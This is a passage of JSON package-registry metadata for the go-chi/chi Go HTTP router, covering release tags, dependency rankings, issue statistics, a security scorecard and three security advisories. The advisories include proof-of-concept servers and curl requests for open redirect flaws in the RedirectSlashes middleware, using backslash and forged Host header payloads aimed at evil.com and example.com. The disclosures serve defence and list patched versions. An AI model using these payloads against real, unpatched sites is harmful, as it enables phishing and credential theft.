leases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.214Z","dependent_packages_count":6010,"downloads":null,"downloads_period":null,"dependent_repos_count":8374,"rankings":{"downloads":null,"dependent_repos_count":0.08548533677487893,"dependent_packages_count":0.061209161040265254,"stargazers_count":0.5140532083974819,"forks_count":0.9126389655444295,"docker_downloads_count":0.18186382932811015,"average":0.35105010021703315},"purl":"pkg:golang/github.com/go-chi/chi/v5","advisories":[{"uuid":"GSA_kwCzR0hTQS00aDc2LTkyNnEtd3h4d84ABSmM","url":"https://github.com/advisories/GHSA-4h76-926q-wxxw","title":"Duplicate Advisory: chi has an open redirect vulnerability in the RedirectSlashes middleware","description":"### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-mqqf-5wvp-8fh8. This link is maintained to preserve external references.\n\n### Original Description\nAn Open Redirect vulnerability in the go-chi/chi \u003e=5.2.2 RedirectSlashes function allows remote attackers to redirect victim users to malicious websites using the legitimate website domain.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-02-19T18:31:54.000Z","withdrawn_at":"2026-06-18T13:01:47.000Z","classification":"GENERAL","cvss_score":4.7,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N","references":["https://github.com/go-chi/chi/security/advisories/GHSA-mqqf-5wvp-8fh8","https://nvd.nist.gov/vuln/detail/CVE-2025-69725","http://go-chichi.com","https://github.com/advisories/GHSA-4h76-926q-wxxw"],"source_kind":"github","identifiers":["GHSA-4h76-926q-wxxw"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-18T14:00:08.806Z","updated_at":"2026-07-12T11:00:38.087Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00aDc2LTkyNnEtd3h4d84ABSmM","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00aDc2LTkyNnEtd3h4d84ABSmM","packages":[{"ecosystem":"go","package_name":"github.com/go-chi/chi/v5","versions":[{"first_patched_version":"5.2.4","vulnerable_version_range":"\u003e= 5.2.2, \u003c 5.2.4"}],"purl":"pkg:go/github.com%2Fgo-chi%2Fchi%2Fv5"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00aDc2LTkyNnEtd3h4d84ABSmM/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tcXFmLTV3dnAtOGZoOM4ABRGi","url":"https://github.com/advisories/GHSA-mqqf-5wvp-8fh8","title":"chi has an open redirect vulnerability in the RedirectSlashes middleware","description":"### Summary\n\nThe `RedirectSlashes` function in middleware/strip.go does not perform correct input validation and can lead to an open redirect vulnerability.\n\n### Details\n\nThe `RedirectSlashes` function performs a `Trim` to all forward slash (`/`) characters, while prepending a single one at the begining of the path (Line 52).\n\nHowever, it does not trim backslashes (`\\`).\n\n```go\nFile: middleware/strip.go\n41: func RedirectSlashes(next http.Handler) http.Handler {\n...\n51: \t\t\t// Trim all leading and trailing slashes (e.g., \"//evil.com\", \"/some/path//\")\n52: \t\t\tpath = \"/\" + strings.Trim(path, \"/\")\n...\n62: }\n```\n\nAlso, from version 5.2.2 onwards the `RedirectSlashes` function does not take into consideration the `Host` Header in the redirect response returned. This was done in order to combat another [[vulnerability](https://github.com/go-chi/chi/security/advisories/GHSA-vrw8-fxc6-2r93)](https://github.com/go-chi/chi/security/advisories/GHSA-vrw8-fxc6-2r93).\n\nThe above make it possible for a response in the following form:\n\n```\nHTTP/1.1 301 Moved Permanently\nLocation: /\\evil.com\n```\n\nThe `/\\evil.com` will be transformed by most browsers (Chrome, Firefox, etc. not Safari) into `//evil.com` which is a protocol relative URL and will result in a redirect to `evil.com`, essentially making it an open redirect vulnerability.\n\n### PoC\n\nA minimal working example can be seen below.\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"net/http\"\n\n\t\"github.com/go-chi/chi/v5\"\n\t\"github.com/go-chi/chi/v5/middleware\"\n)\n\n\n\nfunc main() {\n\tr := chi.NewRouter()\n\n\tr.Use(middleware.RedirectSlashes)\n\n\tr.Get(\"/*\", func(w http.ResponseWriter, r *http.Request) {\n\t\tw.WriteHeader(http.StatusOK)\n\t})\n\n\tfmt.Println(\"Server starting on port 8081...\")\n\tif err := http.ListenAndServe(\":8081\", r); err != nil {\n\t\tfmt.Printf(\"Error starting server: %v\\n\", err)\n\t}\n}\n\n```\n\nAnd when we request the path `/\\evil.com` (needs a second backslash or URL encoding in the terminal), the HTTP Redirect Location is just `/\\evil.com` without any domain/Host information.\n\n```bash\n$ curl -I  localhost:8081/\\\\evil.com/\nHTTP/1.1 301 Moved Permanently\nContent-Type: text/html; charset=utf-8\nLocation: /\\evil.com\n```\n\n```bash\n$ curl -I  localhost:8081/%5Cevil.com/\nHTTP/1.1 301 Moved Permanently\nContent-Type: text/html; charset=utf-8\nLocation: /\\evil.com\n```\n\nThis opened in a browser (Chrome, Firefox) will result in a transformation to `//evil.com` which in turn will result in a redirect to `evil.com`.\n\u003cimg width=\"200\" alt=\"image-20250829115619807\" src=\"https://github.com/user-attachments/assets/44aedad1-64b6-4660-8b26-fad9b4eca036\" /\u003e\n\n\n\u003cimg width=\"200\" alt=\"image-20250829115632067\" src=\"https://github.com/user-attachments/assets/b976d47d-1975-469c-abd3-deb907a68db2\" /\u003e\n\n\n### Impact\n\nThis essentially consists of an open redirect vulnerability, provided that victim users use the most popular browsers (Chrome, Firefox, etc. It does not work in e.g. Safari).\n\nThe attacker can construct a malicious URL on a domain of a legitimate website and send it to the victim user. The victim users thinking that they will click on a legitimate website's URL, they will unknowingly be reidrected to an attacker controlled website.\n\nThis can lead to credential theft if the victim gets redirected to a phishing website, to malware that is hosted on the attacker controlled website etc. Also, it has a greate reputation / business impact for the affected legitimate website.\n\nIn order to exploit this vulnerability the attacker does not need to be authenticated or have ay other priviledge / knowledge regarding the affected application.\n\nCVSS Score: [4.7 (Medium)](https://www.first.org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N)","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-01-14T21:18:06.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.7,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N","references":["https://github.com/go-chi/chi/security/advisories/GHSA-mqqf-5wvp-8fh8","https://github.com/go-chi/chi/issues/1037","https://github.com/go-chi/chi/commit/6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","https://nvd.nist.gov/vuln/detail/CVE-2025-69725","http://go-chichi.com","https://github.com/advisories/GHSA-mqqf-5wvp-8fh8"],"source_kind":"github","identifiers":["GHSA-mqqf-5wvp-8fh8","CVE-2025-69725"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-01-14T22:00:08.040Z","updated_at":"2026-07-12T11:00:38.087Z","epss_percentage":0.00215,"epss_percentile":0.11883,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tcXFmLTV3dnAtOGZoOM4ABRGi","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tcXFmLTV3dnAtOGZoOM4ABRGi","packages":[{"ecosystem":"go","package_name":"github.com/go-chi/chi/v5","versions":[{"first_patched_version":"5.2.4","vulnerable_version_range":"\u003e= 5.2.2, \u003c 5.2.4"}],"purl":"pkg:go/github.com%2Fgo-chi%2Fchi%2Fv5"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tcXFmLTV3dnAtOGZoOM4ABRGi/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12cnc4LWZ4YzYtMnI5M84ABJUh","url":"https://github.com/advisories/GHSA-vrw8-fxc6-2r93","title":"chi Allows Host Header Injection which Leads to Open Redirect in RedirectSlashes","description":"### Summary\nThe RedirectSlashes function in middleware/strip.go is vulnerable to host header injection which leads to open redirect.\n\nWe consider this a **lower-severity** open redirect, as it can't be exploited from browsers or email clients (requires manipulation of a Host header).\n\n### Details\nThe RedirectSlashes method uses the Host header to construct the redirectURL at this line https://github.com/go-chi/chi/blob/master/middleware/strip.go#L55\n\nThe Host header can be manipulated by a user to be any arbitrary host. This leads to open redirect when using the RedirectSlashes middleware\n\n### PoC\nCreate a simple server which uses the RedirectSlashes middleware\n```\npackage main\n\nimport (\n\t\"fmt\"\n\t\"net/http\"\n\n\t\"github.com/go-chi/chi/v5\"\n\t\"github.com/go-chi/chi/v5/middleware\" // Import the middleware package\n)\n\nfunc main() {\n\t// Create a new Chi router\n\tr := chi.NewRouter()\n\n\t// Use the built-in RedirectSlashes middleware\n\tr.Use(middleware.RedirectSlashes) // Use middleware.RedirectSlashes\n\n\t// Define a route handler\n\tr.Get(\"/\", func(w http.ResponseWriter, r *http.Request) {\n\t\t// A simple response\n\t\tw.Write([]byte(\"Hello, World!\"))\n\t})\n\n\t// Start the server\n\tfmt.Println(\"Starting server on :8080\")\n\thttp.ListenAndServe(\":8080\", r)\n}\n```\nRun the server `go run main.go`\n\nOnce the server is running, send a request that will trigger the RedirectSlashes function with an arbitrary Host header\n`curl -iL -H \"Host: example.com\" http://localhost:8080/test/`\n\nObserve that the request will be redirected to example.com\n\n```\ncurl -L -H \"Host: example.com\" http://localhost:8080/test/\n\n\u003c!doctype html\u003e\n\u003chtml\u003e\n\u003chead\u003e\n    \u003ctitle\u003eExample Domain\u003c/title\u003e\n\n    \u003cmeta charset=\"utf-8\" /\u003e\n    \u003cmeta http-equiv=\"Content-type\" content=\"text/html; charset=utf-8\" /\u003e\n    \u003cmeta name=\"viewport\" content=\"width=device-width, initial-scale=1\" /\u003e\n    \u003cstyle type=\"text/css\"\u003e\n    body {\n        background-color: #f0f0f2;\n        margin: 0;\n        padding: 0;\n        font-family: -apple-system, system-ui, BlinkMacSystemFont, \"Segoe UI\", \"Open Sans\", \"Helvetica Neue\", Helvetica, Arial, sans-serif;\n... snipped ...\n```\nWithout the host header, the response is returned from the test server\n```\ncurl -L http://localhost:8080/test/\n\n404 page not found\n```\n\n### Impact\nAn open redirect vulnerability allows attackers to trick users into visiting malicious sites. This can lead to phishing attacks, credential theft, and malware distribution, as users trust the application’s domain while being redirected to harmful sites.\n\n### Potential mitigation\nIt seems that the purpose of the RedirectSlashes function is to redirect within the same application. In that case r.RequestURI can be used instead of r.Host by default. If there is a use case to redirect to a different host, a flag can be added to use the Host header instead. As this flag will be controlled by the developer they will make the decision of allowing redirects to arbitrary hosts  based on their judgement.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-06-20T16:37:47.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.1,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N","references":["https://github.com/go-chi/chi/security/advisories/GHSA-vrw8-fxc6-2r93","https://github.com/go-chi/chi/commit/1be7ad938cc9c5b39a9dea01a5c518848928ab65","https://github.com/advisories/GHSA-vrw8-fxc6-2r93"],"source_kind":"github","identifiers":["GHSA-vrw8-fxc6-2r93"],"repository_url":"https://github.com/go-chi/chi","blast_radius":20.00695807843158,"created_at":"2025-06-20T17:08:53.188Z","updated_at":"2026-07-12T11:04:01.228Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12cnc4LWZ4YzYtMnI5M84ABJUh","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12cnc4LWZ4YzYtMnI5M84ABJUh","packages":[{"ecosystem":"go","package_name":"github.com/go-chi/chi/v5","versions":[{"first_patched_version":"5.2.2","vulnerable_version_range":"\u003c= 5.2.1"}],"purl":"pkg:go/github.com%2Fgo-chi%2Fchi%2Fv5"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12cnc4LWZ4YzYtMnI5M84ABJUh/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/go-chi/chi/v5","docker_dependents_count":1920,"docker_downloads_count":1239120578,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/go-chi/chi/v5","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/go-chi/chi/v5/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv5/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv5/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv5/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv5/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv5/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv5/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":13964188,"name":"go-github-com-go-chi-chi","ecosystem":"guix","description":"Lightweight router for building Go HTTP services","homepage":"https://github.com/go-chi/chi","licenses":"expat","normalized_licenses":["Other"],"repository_url":"https://github.com/go-chi/chi","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-03-02T23:07:19.290Z","latest_release_published_at":"2026-03-02T23:07:19.290Z","latest_release_number":"4.1.3","last_synced_at":"2026-04-07T02:02:13.176Z","created_at":"2026-03-02T23:07:19.043Z","updated_at":"2026-08-08T10:51:35.132Z","registry_url":"https://packages.guix.gnu.org/packages/go-github-com-go-chi-chi/4.1.3/","install_command":"guix install go-github-com-go-chi-chi","documentation_url":"https://git.savannah.gnu.org/cgit/guix.git/tree/gnu/packages/golang-web.scm#n5421","metadata":{"location":"gnu/packages/golang-web.scm:5421","variable_name":"go-github-com-go-chi-chi"},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info: 